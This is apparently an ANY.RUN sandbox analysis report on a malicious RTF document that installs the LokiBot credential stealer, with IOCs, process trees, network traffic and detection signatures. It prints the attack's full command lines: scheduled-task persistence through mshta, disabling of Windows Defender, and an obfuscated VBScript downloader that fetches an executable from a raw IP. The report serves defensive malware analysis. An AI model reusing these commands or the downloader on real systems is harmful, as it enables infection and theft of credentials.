analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

0001.doc

Full analysis: https://app.any.run/tasks/45059934-0ced-4247-9a51-6ec0d8d6ca7d
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: January 23, 2019, 08:55:32
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
ole-embedded
loader
trojan
lokibot
opendir
Indicators:
MIME: text/rtf
File info: Rich Text Format data, version 1, ANSI
MD5:

6D5EEF8F3DF1D7730F7FF22A4B13B23F

SHA1:

9452DB4D96BA98D72629AC1EB50E4FAE55F7F401

SHA256:

E3C786FEC0479F5AF52D7740E77479014C8863E5E9F0C639095595D999C2D80F

SSDEEP:

6144:kX0OPX0OVX0OiX0OXX0O0X0OrX0OxX0Oy:kv1C3ULRS

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • EXCEL.EXE (PID: 3848)

    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 3848)

    • Changes settings of System certificates

      • mshta.exe (PID: 2732)

    • Loads the Task Scheduler COM API

      • schtasks.exe (PID: 3240)

    • Uses Task Scheduler to run other applications

      • mshta.exe (PID: 2732)

    • Uses TASKKILL.EXE to kill antiviruses

      • cmd.exe (PID: 3832)

    • Application was dropped or rewritten from another process

      • AVASTINT.EXE (PID: 3980)
      • AVASTINT.EXE (PID: 3224)

    • Downloads executable files from IP

      • WScript.exe (PID: 4072)

    • Downloads executable files from the Internet

      • WScript.exe (PID: 4072)

    • LOKIBOT was detected

      • AVASTINT.EXE (PID: 3224)

    • Connects to CnC server

      • AVASTINT.EXE (PID: 3224)

    • Detected artifacts of LokiBot

      • AVASTINT.EXE (PID: 3224)

    • Actions looks like stealing of personal data

      • AVASTINT.EXE (PID: 3224)

  • SUSPICIOUS

    • Adds / modifies Windows certificates

      • mshta.exe (PID: 2732)

    • Starts CMD.EXE for commands execution

      • mshta.exe (PID: 2732)

    • Creates files in the user directory

      • mshta.exe (PID: 2732)
      • AVASTINT.EXE (PID: 3224)

    • Executes scripts

      • cmd.exe (PID: 2444)

    • Uses TASKKILL.EXE to kill Office Apps

      • cmd.exe (PID: 3832)

    • Executable content was dropped or overwritten

      • WScript.exe (PID: 4072)
      • AVASTINT.EXE (PID: 3224)

    • Uses TASKKILL.EXE to kill process

      • cmd.exe (PID: 3832)

    • Application launched itself

      • AVASTINT.EXE (PID: 3980)

    • Loads DLL from Mozilla Firefox

      • AVASTINT.EXE (PID: 3224)

  • INFO

    • Reads internet explorer settings

      • mshta.exe (PID: 2732)

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3000)

    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 3848)
      • WINWORD.EXE (PID: 3000)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rtf | Rich Text Format (100)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
52
Monitored processes
18
Malicious processes
6
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs excel.exe no specs mshta.exe schtasks.exe no specs cmd.exe no specs cmd.exe no specs mpcmdrun.exe no specs taskkill.exe no specs wscript.exe taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs timeout.exe no specs avastint.exe no specs #LOKIBOT avastint.exe

Process information

PID
CMD
Path
Indicators
Parent process
3000"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\0001.doc.rtf"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
1
Version:
14.0.6024.1000
3848"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\EXCEL.EXEsvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
1
Version:
14.0.6024.1000
2732mshta.exe https://methodsofcreation.blogspot.com/p/encryption2.htmlC:\Windows\system32\mshta.exe
EXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3240"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 20 /tn "MSOFFICE" /tr "mshta vbscript:CreateObject(\"Wscript.Shell\").Run(\"mshta.exe https://tinytech997.blogspot.com/p/loader.html\",0,true)(window.close)" /FC:\Windows\System32\schtasks.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Manages scheduled tasks
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3832"C:\Windows\System32\cmd.exe" /c cd "C:\Program Files\Windows Defender" & MpCmdRun.exe -removedefinitions -dynamicsignatures & taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE & taskkill /f /im mshta.exe & taskkill /f /im MSASCuiL.exe & taskkill /f /im MpCmdRun.exe & exitC:\Windows\System32\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
128
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2444"C:\Windows\System32\cmd.exe" /c cd C:\Users\Public &@echo AmmEiqWkls = "http://216.170.120.102/kates.exe">>UpdateWindow.vbs &@echo ZIMMER = L0u("NcN`aV[a;ReR")>>UpdateWindow.vbs &@echo Set ZIMMERing = CreateObject(L0u("Z`eZY?;eZYUaa]"))>>UpdateWindow.vbs &@echo ZIMMERing.Open L0u("TRa"), AmmEiqWkls, False>>UpdateWindow.vbs &@echo ZIMMERing.send ("")>>UpdateWindow.vbs &@echo Set FatherOFVidus = CreateObject(L0u("NQ\QO;`a_RNZ"))>>UpdateWindow.vbs &@echo FatherOFVidus.Open>>UpdateWindow.vbs &@echo FatherOFVidus.Type = 1 >>UpdateWindow.vbs &@echo FatherOFVidus.Write ZIMMERing.ResponseBody>>UpdateWindow.vbs & @echo FatherOFVidus.Position = 0 >>UpdateWindow.vbs &@echo FatherOFVidus.SaveToFile ZIMMER, 2 >>UpdateWindow.vbs &@echo FatherOFVidus.Close>>UpdateWindow.vbs &@echo function L0u(K4d) >> UpdateWindow.vbs &@echo For Dintannaa = 1 To Len(K4d) >>UpdateWindow.vbs &@echo BuEllWsWam = Mid(K4d, Dintannaa, 1) >>UpdateWindow.vbs &@echo BuEllWsWam = Chr(Asc(BuEllWsWam)- 13) >>UpdateWindow.vbs &@echo VuzEgEas = VuzEgEas + BuEllWsWam >> UpdateWindow.vbs &@echo Next >>UpdateWindow.vbs &@echo L0u = VuzEgEas >>UpdateWindow.vbs &@echo End Function >>UpdateWindow.vbs& UpdateWindow.vbs &dEl UpdateWindow.vbs & timeout 12 & AVASTINT.EXEC:\Windows\System32\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2780MpCmdRun.exe -removedefinitions -dynamicsignatures C:\Program Files\Windows Defender\MpCmdRun.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Malware Protection Command Line Utility
Exit code:
2
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2288taskkill /f /im winword.exe C:\Windows\system32\taskkill.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Terminates Processes
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
4072"C:\Windows\System32\WScript.exe" "C:\Users\Public\UpdateWindow.vbs" C:\Windows\System32\WScript.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
3720taskkill /f /im excel.exe C:\Windows\system32\taskkill.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Terminates Processes
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
749
Read events
612
Write events
132
Delete events
5

Modification events

(PID) Process:(3000) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:0t%
Value:
30742500B80B0000010000000000000000000000
(PID) Process:(3000) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(3000) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
On
(PID) Process:(3000) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:WORDFiles
Value:
1312227358
(PID) Process:(3000) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1312227472
(PID) Process:(3000) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1312227473
(PID) Process:(3000) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
Operation:writeName:MTTT
Value:
B80B00008CEC2575F9B2D40100000000
(PID) Process:(3000) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:6u%
Value:
36752500B80B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(3000) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:delete valueName:6u%
Value:
36752500B80B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(3000) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
Executable files
3
Suspicious files
5
Text files
45
Unknown types
7

Dropped files

PID
Process
Filename
Type
3000WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR9810.tmp.cvr
MD5:
SHA256:
3848EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVRA29F.tmp.cvr
MD5:
SHA256:
2732mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0UU90R59\plusone[1].jstext
MD5:E0D238A2B59C86393AB27378ABFA1131
SHA256:0015A708B6D2F12384EE780A36BCB03B5DF66A7DAC9DA2BF0E162F976019492B
2732mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\encryption2[1].htmlhtml
MD5:D065EDDF1666A1F63D6B0AD5B128D31E
SHA256:5303DE0730DBEFC2AFB2C7BB4B7E13A24FF1EAA4BA3F4DC572AE303FF864F003
3000WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$01.doc.rtfpgc
MD5:92CCE27E4D73CDE631BC874B15878DA1
SHA256:483774A3F4004D7DF86E34B1C2DC2867CB13AE585614B49B97F264DA4FF67546
2732mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R9ZEWH8D\cb=gapi[1].loaded_1text
MD5:603EC60EFE600D441FC21C6FBCB3430B
SHA256:2F186A262082026CA95C58DC03685671EC56E5493056BFA4E8D8887E594DF96D
2732mshta.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@google[1].txttext
MD5:FA4D10F8E1819FDFAEA206C788B09BA7
SHA256:0FA5A47702D28E2290FE98B30E934C645E85CB778FFBE2EBAC8CE2CE7AACCE91
3000WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\99BA1CC.wmfwmf
MD5:F805B2269DCC910D671B2B45FE6CB033
SHA256:631983654C0F69751EB4AC2FD166981E1D7C1F895E1D8405D312092F310C0A3F
2732mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D2YPIJ90\211300122-widgets[1].jstext
MD5:12926C0E6033D425F424771F4BBE3A7C
SHA256:4DC814BE3C423A930D46F18AD50F1F3DB9B57F4F657DC7ED7C9D1F825F7A9E89
2732mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0UU90R59\error[1]
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
18
DNS requests
8
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4072
WScript.exe
GET
200
216.170.120.102:80
http://216.170.120.102/kates.exe
US
executable
1.17 Mb
suspicious
3224
AVASTINT.EXE
POST
103.63.2.245:80
http://slomiter45u.us/gert/starboy/fre.php
HK
malicious
3224
AVASTINT.EXE
POST
103.63.2.245:80
http://slomiter45u.us/gert/starboy/fre.php
HK
malicious
3224
AVASTINT.EXE
POST
103.63.2.245:80
http://slomiter45u.us/gert/starboy/fre.php
HK
malicious
3224
AVASTINT.EXE
POST
103.63.2.245:80
http://slomiter45u.us/gert/starboy/fre.php
HK
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2732
mshta.exe
172.217.22.65:443
methodsofcreation.blogspot.com
Google Inc.
US
whitelisted
2732
mshta.exe
216.58.210.2:443
pagead2.googlesyndication.com
Google Inc.
US
whitelisted
2732
mshta.exe
172.217.16.201:443
www.blogger.com
Google Inc.
US
whitelisted
2732
mshta.exe
172.217.22.14:443
apis.google.com
Google Inc.
US
whitelisted
4072
WScript.exe
216.170.120.102:80
ColoCrossing
US
suspicious
2732
mshta.exe
172.217.16.141:443
accounts.google.com
Google Inc.
US
suspicious
3224
AVASTINT.EXE
103.63.2.245:80
slomiter45u.us
Guochao Group limited
HK
suspicious

DNS requests

Domain
IP
Reputation
methodsofcreation.blogspot.com
  • 172.217.22.65
whitelisted
www.blogger.com
  • 172.217.16.201
shared
apis.google.com
  • 172.217.22.14
whitelisted
pagead2.googlesyndication.com
  • 216.58.210.2
whitelisted
resources.blogblog.com
  • 172.217.16.201
whitelisted
accounts.google.com
  • 172.217.16.141
shared
img1.blogblog.com
  • 172.217.16.201
suspicious
slomiter45u.us
  • 103.63.2.245
malicious

Threats

PID
Process
Class
Message
4072
WScript.exe
A Network Trojan was detected
ET INFO Executable Download from dotted-quad Host
4072
WScript.exe
A Network Trojan was detected
ET CURRENT_EVENTS Likely Evil EXE download from dotted Quad by MSXMLHTTP M1
4072
WScript.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
4072
WScript.exe
A Network Trojan was detected
ET CURRENT_EVENTS Likely Evil EXE download from dotted Quad by MSXMLHTTP M2
4072
WScript.exe
Potentially Bad Traffic
ET INFO SUSPICIOUS Dotted Quad Host MZ Response
3224
AVASTINT.EXE
Misc Attack
ET DROP Spamhaus DROP Listed Traffic Inbound group 4
3224
AVASTINT.EXE
A Network Trojan was detected
ET TROJAN LokiBot User-Agent (Charon/Inferno)
3224
AVASTINT.EXE
A Network Trojan was detected
ET TROJAN LokiBot Checkin
3224
AVASTINT.EXE
A Network Trojan was detected
ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1
3224
AVASTINT.EXE
A Network Trojan was detected
ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2
4 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
0001.doc